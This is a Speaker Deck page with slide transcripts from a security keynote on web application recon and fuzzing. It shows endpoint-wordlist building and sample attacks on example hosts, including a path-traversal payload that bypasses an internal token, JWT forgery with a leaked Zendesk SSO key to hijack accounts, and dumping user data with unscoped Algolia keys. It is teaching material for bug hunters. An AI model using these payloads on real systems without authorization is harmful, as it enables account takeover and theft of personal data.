Upgrade to Pro — share decks privately, control downloads, hide ads and more …

A methodology using fuzzing and info disclosure

Frans Rosén
October 01, 2020
Research
0
170

A methodology using fuzzing and info disclosure

My keynote from the first BSides Ahmedabad in Oct 2019.

Youtube: https://www.youtube.com/watch?v=rAuuN0OohJc

Frans Rosén

October 01, 2020
Tweet

More Decks by Frans Rosén

See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
fransrosen
0
510
Story of a RCE on Apple through hot jar swapping
fransrosen
0
920
Account hijacking using "dirty dancing" in sign-in OAuth-flows
fransrosen
0
130
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
fransrosen
3
8.6k
Web based format injection, dumping memory like it's 99 (or "Please help")
fransrosen
0
51
A story of the passive aggressive sysadmin of AEM
fransrosen
0
7.7k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
fransrosen
3
6.5k

Other Decks in Research

See All in Research
SSII2024 [OS1] 画像認識におけるモデル・データの共進化
ssii
PRO
0
460
LLM based AI Agents Overview -What, Why, How-
masatoto
1
320
大規模言語モデルのバイアス
yukinobaba
PRO
4
510
「確率的なオウム」にできること、またそれがなぜできるのかについて
eumesy
PRO
7
2.9k
DiscordにおけるキャラクターIPを活用したUGCコンテンツ生成サービスの ラピッドプロトタイピング ~国際ハッカソンでの事例研究
o_ob
0
210
SSII2024 [PD] 30周年記念特別企画 SSII 技術マップ / LLMサーベイ
ssii
PRO
0
740
Active Adaptive Experimental Design for Treatment Effect Estimation with Covariate Choices
masakat0
0
170
Weekly AI Agents News! 7月号 プロダクト/ニュースのアーカイブ
masatoto
0
120
日本語医療LLM評価ベンチマークの構築と性能分析
fta98
3
390
初めての研究発表を成功させよう! スライド作成の基本
ayaco0
11
4.4k
#SRE論文紹介 Detection is Better Than Cure: A Cloud Incidents Perspective
V. Ganatra et. al., ESEC/FSE’23
yuukit
3
1.2k
第60回名古屋CV・PRML勉強会:CVPR2024論文紹介(AM-RADIO)
naok615
0
200

Featured

See All Featured
What's in a price? How to price your products and services
michaelherold
242
11k
Statistics for Hackers
jakevdp
794
220k
Music & Morning Musume
bryan
46
6k
Being A Developer After 40
akosma
84
590k
Bash Introduction
62gerente
608
210k
Learning to Love Humans: Emotional Interface Design
aarron
270
40k
Robots, Beer and Maslow
schacon
PRO
157
8.2k
How to Think Like a Performance Engineer
csswizardry
16
960
[RailsConf 2023] Rails as a piece of cake
palkan
48
4.6k
What the flash - Photography Introduction
edds
67
11k
GitHub's CSS Performance
jonrohan
1029
450k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
29
2.2k

Transcript

  1. FRANS ROSÉN A methodology using fuzzing and info disclosure

  2. FRANS ROSÉN Security Advisor @detectify CTO @centra HackerOne #5 @

    /leaderboard/all-time Blogs at labs.detectify.com @fransrosen

  3. FRANS ROSÉN Rundown • Imaginary app structure and methodology on

    breaking it

  4. FRANS ROSÉN Rundown • Imaginary app structure and methodology on

    breaking it • Real-life vulnerabilities found
 using these techniques

  5. FRANS ROSÉN Rundown • Imaginary app structure and methodology on

    breaking it • Real-life vulnerabilities found
 using these techniques • Many ways to do this, this is just one example!

  6. FRANS ROSÉN Structure of our imaginary app

  7. FRANS ROSÉN Client based micro services business.example.com SPA + a

    lot of JS

  8. FRANS ROSÉN Client based micro services invoice.example.com business.example.com conversation.example.com api.example.com

    CORS-requests to different apps SPA + a lot of JS

  9. FRANS ROSÉN Client based micro services business.example.com /api/v1/users /api/v1/users/123 …

    /api/v3/invoices /api/v3/invoices/123 … /api/v2/messages /api/v2/messages/123 … CORS-requests to different apps: SPA + a lot of JS invoice.example.com conversation.example.com api.example.com

  10. FRANS ROSÉN Ways forward 1.Locate all APIs/micro-services used

  11. FRANS ROSÉN Ways forward 1.Locate all APIs/micro-services used 2.Extract all

    API-endpoints we can find

  12. FRANS ROSÉN API-endpoints per microservice • invoice.example.com

  13. FRANS ROSÉN API-endpoints per microservice • invoice.example.com /api/v3/invoices /api/v3/invoices/1234 /api/v3/accounts

    /api/v3/accounts/1234 Found in JS:

  14. FRANS ROSÉN API-endpoints per microservice • invoice.example.com Found in JS:

    /invoices* /accounts* /api /api/v3 /api/v3/invoices* /api/v3/accounts* … Save to path-lists: /api/v3/invoices /api/v3/invoices/1234 /api/v3/accounts /api/v3/accounts/1234

  15. FRANS ROSÉN • invoice.example.com Found in JS: /invoices* /accounts* /api

    /api/v3 /api/v3/invoices* /api/v3/accounts* … Save to path-lists: /api/v3/invoices /api/v3/invoices/1234 /api/v3/accounts /api/v3/accounts/1234 The * tells us it supports direct requests or additional paths for IDs or similar: /invoices/123

  16. FRANS ROSÉN API-endpoints per microservice • conversation.example.com /api/v2/online /api/v2/conversations /api/v2/websocket

    Found in JS:

  17. FRANS ROSÉN API-endpoints per microservice • conversation.example.com /api/v2/online /api/v2/conversations /api/v2/websocket

    Found in JS: /online /conversations* /websocket /api/v2 /api/v2/conversations* … Save to path-lists:

  18. FRANS ROSÉN Continue to curate lists Find more endpoints: •

    Desktop client • Web-archive • PHP/Java/Golang-SDKs • npm/composer/yarn • Documentation

  19. FRANS ROSÉN Now we have this • List of all

    available endpoints: /conversations* /invoices* /users* …

  20. FRANS ROSÉN Now we have this • List of all

    available endpoints: • Also separate prefixes: /api /api/v3 /api/v2 /api/v1 … /conversations* /invoices* /users* …

  21. FRANS ROSÉN Now we have this • List of all

    available endpoints: • Also separate prefixes: /api /api/v3 /api/v2 /api/v1 … /conversations* /invoices* /users* … • And all subdomains used: invoice.example.com api.example.com business.example.com …

  22. FRANS ROSÉN Now, combine it all: • Test everything on

    everything
 subdomain-list * path-prefix-list * path-suffix-list • Add additional standard fuzz to suffix-list test " '
 # …

  23. FRANS ROSÉN What we might find • New or old

    endpoints not in use
 Might leak more data than the current one


  24. FRANS ROSÉN What we might find • New or old

    endpoints not in use
 Might leak more data than the current one
 
 Example of this happening IRL!

  25. FRANS ROSÉN { "boards": [ { "id": 123, "user": 124,

    "username": "test" … } ] } API currently in use, v2 /api/v2/boards/123

  26. FRANS ROSÉN /api/v4/boards/123 { "includes": {"user": false}, "boards": [ {

    "id": 123, "user": 124, "username": "test" … } ] v4 was a JSON-API not being used

  27. FRANS ROSÉN /api/v4/boards/123 { "includes": {"user": false}, "boards": [ {

    "id": 123, "user": 124, "username": "test" … } ] Tells us what to include

  28. FRANS ROSÉN /api/v4/boards/123? include=user { "includes": {"user": true}, "boards": [

    { "attributes": { "user": { "email": "[email protected]", "phone": "004324235342" … } "New version of JSON-API for message boards leaked emails + phone numbers for all users"

  29. FRANS ROSÉN What we might find • New or old

    endpoints not in use
 Might leak more data than the current one • That the micro-services might connect server-side:
 SSRF, path-traversal, bypass query-strings used…


  30. FRANS ROSÉN What we might find • New or old

    endpoints not in use
 Might leak more data than the current one • That the micro-services might connect server-side:
 SSRF, path-traversal, bypass query-strings used…
 
 Example of this happening IRL!

  31. FRANS ROSÉN Regular API-endpoint to fetch invoices /api/v3/invoices/123

  32. FRANS ROSÉN Regular API-endpoint to fetch invoices /api/v3/invoices/123 { "invoice":

    { "url": "/api/v3/invoices/ 123?token=xyz&expire=123 } }

  33. FRANS ROSÉN Different ID than my own invoices /api/v3/invoices/124 {

    "error": "access denied" }

  34. FRANS ROSÉN Fuzzing, double quote: /api/v3/invoices/" { "error": "Bad URI:

    /api/v1/ invoices/\"" }

  35. FRANS ROSÉN Sent to v3, error with v1? /api/v3/invoices/" {

    "error": "Bad URI: /api/v1/ invoices/\"" }

  36. FRANS ROSÉN Possible explanation Endpoint at /api/v3/invoices/{id} makes an internal

    call to a different service: route('/api/v3/invoices/{id}', () => { return api.call( `http://internal-api/api/v1/invoices/${id}? token=${userToken}` ) })

  37. FRANS ROSÉN Possible explanation Endpoint at /api/v3/invoices/{id} makes an internal

    call to a different service: route('/api/v3/invoices/{id}', () => { return api.call( `http://internal-api/api/v1/invoices/${id}? token=${userToken}` ) })

  38. FRANS ROSÉN Send valid accessible ID, fuzz query-params /api/v3/invoices/123?FUZZ=x& /api/v3/invoices/123%3fFUZZ%3dx%26

  39. FRANS ROSÉN Send valid accessible ID, fuzz query-params /api/v3/invoices/123?FUZZ=x& /api/v3/invoices/123%3fFUZZ%3dx%26

    Theory: server-side call: http://internal-api/api/v1/invoices/ 123?token=x&token=xxx

  40. FRANS ROSÉN Send valid accessible ID, fuzz query-params { "error":

    "access denied" } /api/v3/invoices/123?FUZZ=x& /api/v3/invoices/123%3fFUZZ%3dx%26 Theory: server-side call: http://internal-api/api/v1/invoices/ 123?token=x&token=xxx

  41. FRANS ROSÉN /api/v3/invoices/123%3ftoken%3dx%26 http://internal-api/api/v1/invoices/ 123?token=x&token=xxx { "error": "access denied" }

    We now know that token is being used! Theory: server-side call:

  42. FRANS ROSÉN Path-traversal, reach outside of invoices/ /api/v3/invoices/%2e%2e%2fFUZZ

  43. FRANS ROSÉN Path-traversal, reach outside of invoices/ /api/v3/invoices/%2e%2e%2fFUZZ We know

    token is used in query, move it to fragment: /api/v3/invoices/%2e%2e%2fFUZZ%23 internal-api/api/v1/invoices/../FUZZ#

  44. FRANS ROSÉN Traversing into accounts/ without the token query parameter

    /api/v3/invoices/%2e%2e%2faccounts%23

  45. FRANS ROSÉN Traversing into accounts/ without the token query parameter

    /api/v3/invoices/%2e%2e%2faccounts%23 { "accounts": [ {"account": 123, "name": "Other Business", "email": "[email protected]", "invoices": [ {"id": 123, "amount": 1100.00 …} {"id": 123, "amount": 1100.00 …} … ]

  46. FRANS ROSÉN "Path-traversal getting access to all invoice accounts" /api/v3/invoices/%2e%2e%2faccounts%23

    { "accounts": [ {"account": 123, "name": "Other Business", "email": "[email protected]", "invoices": [ {"id": 123, "amount": 1100.00 …} {"id": 123, "amount": 1100.00 …} … ] We can access all accounts and all their invoices!

  47. FRANS ROSÉN "Path-traversal getting access to all invoice accounts" {

    "accounts": [ {"account": 123, "name": "Other Business", "email": "[email protected]", "invoices": [ {"id": 123, "amount": 1100.00 …} {"id": 123, "amount": 1100.00 …} … ] http://internal-api /api/v1/invoices/../accounts#token=xxx

  48. FRANS ROSÉN Ways forward 1.Locate all APIs/micro-services used 2.Extract all

    API-endpoints we can find 3.Look at other strings in JS-files

  49. FRANS ROSÉN What we might find • Keys or tokens

    expected to be secrets
 Third party apps with unclear docs if tokens should be secrets. 


  50. FRANS ROSÉN What we might find • Keys or tokens

    expected to be secrets
 Third party apps with unclear docs if tokens should be secrets.
 
 Example of this happening IRL!


  51. FRANS ROSÉN Zendesk SSO-key

  52. FRANS ROSÉN Zendesk SSO-key zdkey: "fafc5aef56caefa56fcea65" zdaccessurl: "https://example.zendesk.com /access/jwt?"

  53. FRANS ROSÉN Zendesk SSO-key • Not an API-key, used for

    JWT-signing for simple SSO

  54. FRANS ROSÉN Zendesk SSO-key • This JSON should be signed

    with the SSO-key: { "iat": 123, "jti": "uuid", "name" "x", "email": "[email protected]", "external_id": "UUID" }

  55. FRANS ROSÉN Zendesk SSO-key • This JSON should be signed

    with the SSO-key: { "iat": 123, "jti": "uuid", "name" "x", "email": "[email protected]", "external_id": "UUID" } unix timestamp random unique ID

  56. FRANS ROSÉN Zendesk SSO-key • This JSON should be signed

    with the SSO-key: { "iat": 123, "jti": "uuid", "name" "x", "email": "[email protected]", "external_id": "UUID" } unix timestamp random unique ID name for user, will be updated email for user, will be updated

  57. FRANS ROSÉN Zendesk SSO-key • This JSON should be signed

    with the SSO-key: { "iat": 123, "jti": "uuid", "name" "x", "email": "[email protected]", "external_id": "UUID" } unix timestamp random unique ID name for user, will be updated email for user, will be updated UserID to hijack account

  58. FRANS ROSÉN Zendesk SSO-key • Send JWT for UserID you

    want to hijack: https://example.zendesk.com/access/jwt? eYAAA.eYBBB.XXX

  59. FRANS ROSÉN Zendesk SSO-key • Send JWT for UserID you

    want to hijack: https://example.zendesk.com/access/jwt? eYAAA.eYBBB.XXX • Zendesk will reply with a session as the UserID: https://example.zendesk.com/hc/en-us? flash_digest=0cbfae0bec0bfea08cbfec0

  60. FRANS ROSÉN "Account hijack on support panel due to publicly

    disclosed Zendesk SSO-key" • Send JWT for UserID you want to hijack: https://example.zendesk.com/access/jwt? eYAAA.eYBBB.XXX • Zendesk will reply with a session as the UserID: https://example.zendesk.com/hc/en-us? flash_digest=0cbfae0bec0bfea08cbfec0

  61. FRANS ROSÉN What we might find • Keys or tokens

    expected to be secrets
 Third party apps with unclear docs if tokens should be secrets.
 
 


  62. FRANS ROSÉN What we might find • Keys or tokens

    expected to be secrets
 Third party apps with unclear docs if tokens should be secrets.
 
 Another example of this happening IRL!


  63. FRANS ROSÉN Algolia API-key Intended to be public a =

    algolia('AFBKDE54', '7ace8b8c7fbea78caebcf78ecbfaebca7 8f'); idx = a.index('userdb');

  64. FRANS ROSÉN a = algolia('AFBKDE54', '7ace8b8c7fbea78caebcf78ecbfaebca7 8f'); idx = a.index('publicdb');

    App-ID Public API-key Algolia API-key Intended to be public Index name

  65. FRANS ROSÉN POST /1/indexes/publicdb/query?x- algolia-application-id=AppID&x- algolia-api-key=PublicApiKey HTTP/1.1 Host: AppId-dsn.algolia.net {"params":"query=*&hitsPerPage=1"}

    Algolia API call

  66. FRANS ROSÉN HTTP/1.1 200 OK {"result": [ {"id": 123, "user":

    "x"}, … ]} POST /1/indexes/publicdb/query

  67. FRANS ROSÉN POST /1/indexes/userdb/query?x- algolia-api-key=PublicApiKey&… {"params":"query=*&hitsPerPage=1"} Try another index +

    Scoped API-key

  68. FRANS ROSÉN POST /1/indexes/userdb/query?x- algolia-api-key=PublicApiKey&… {"message":"Index not allowed with this

    API key","status":403} Try another index + Scoped API-key

  69. FRANS ROSÉN POST /1/indexes/userdb/query?x- algolia-api- key=AnotherPublicApiKey&… {"params":"query=*&hitsPerPage=1"} Unscoped API-key

  70. FRANS ROSÉN HTTP/1.1 200 OK {"result": [ {"id": 123, "user":

    "x", "email": "[email protected]", "phone": "003234234.."}, … ]} Another index with sensitive data

  71. FRANS ROSÉN HTTP/1.1 200 OK {"result": [ {"id": 123, "user":

    "x", "email": "[email protected]", "phone": "003234234.."}, … ]} Another index with sensitive data

  72. FRANS ROSÉN "Emails + phone for all users disclosed due

    to sensitive data in public AlgoliaDB" HTTP/1.1 200 OK {"result": [ {"id": 123, "user": "x", "email": "[email protected]", "phone": "003234234.."}, … ]}

  73. FRANS ROSÉN What we might find • Keys or tokens

    expected to be secrets
 Third party apps with unclear docs if tokens should be secrets. • Secret ENV variables dumped in CI-minification
 If any minifications or 
 
 Example of this happening IRL!


  74. FRANS ROSÉN What we might find

  75. FRANS ROSÉN What we might find

  76. FRANS ROSÉN What we might find

  77. FRANS ROSÉN

  78. FRANS ROSÉN Ways forward 1.Locate all APIs/micro-services used 2.Extract all

    API-endpoints we can find 3.Look at other strings in JS-files 4.Create wordlists

  79. FRANS ROSÉN Wordlists! • For every program:

  80. FRANS ROSÉN Wordlists! • For every program: • Build /

    combine

  81. FRANS ROSÉN Wordlists! • For every program: • Build /

    combine

  82. FRANS ROSÉN Wordlists! • For every program: • Build /

    combine

  83. FRANS ROSÉN Wordlists! • For every program: • Build /

    combine • Apply context!

  84. FRANS ROSÉN Wordlists! • For every program: • Build /

    combine • Apply context! /api/v1/payment /api/v1/payment-methods /api/v1/shipping

  85. FRANS ROSÉN Wordlists! • For every program: • Build /

    combine • Apply context! /api/v1/payment /api/v1/payment-methods /api/v1/shipping /api/v1/shipping-methods Also add this

  86. FRANS ROSÉN Ways forward 1.Locate all APIs/micro-services used 2.Extract all

    API-endpoints we can find 3.Look at other strings in JS-files 4.Create wordlists 5.Fuzz, fuzz, fuzz

  87. FRANS ROSÉN Fuzz with / without • All HTTP-methods POST

    PATCH DELETE PUT… • IDs or not /users/1 vs /users • / in the end /payments/ vs /payments • File extension users.json vs users

  88. FRANS ROSÉN Fuzz combination • Again, combine paths + endpoints

    on subdomains • Skip paths, try all methods, add regular fuzz characters: \ " ' & # .. ö % ? NULL

  89. FRANS ROSÉN • Curate your own context specific wordlists Takeaways

  90. FRANS ROSÉN • Curate your own context specific wordlists •

    Combine with regular fuzzing Takeaways

  91. FRANS ROSÉN • Curate your own context specific wordlists •

    Combine with regular fuzzing • Understand and learn what is being disclosed
 and how to abuse it. Takeaways

  92. FRANS ROSÉN Takeaways That’s it, thank you!
 Any questions? •

    Curate your own context specific wordlists • Combine with regular fuzzing • Understand and learn what is being disclosed
 and how to abuse it.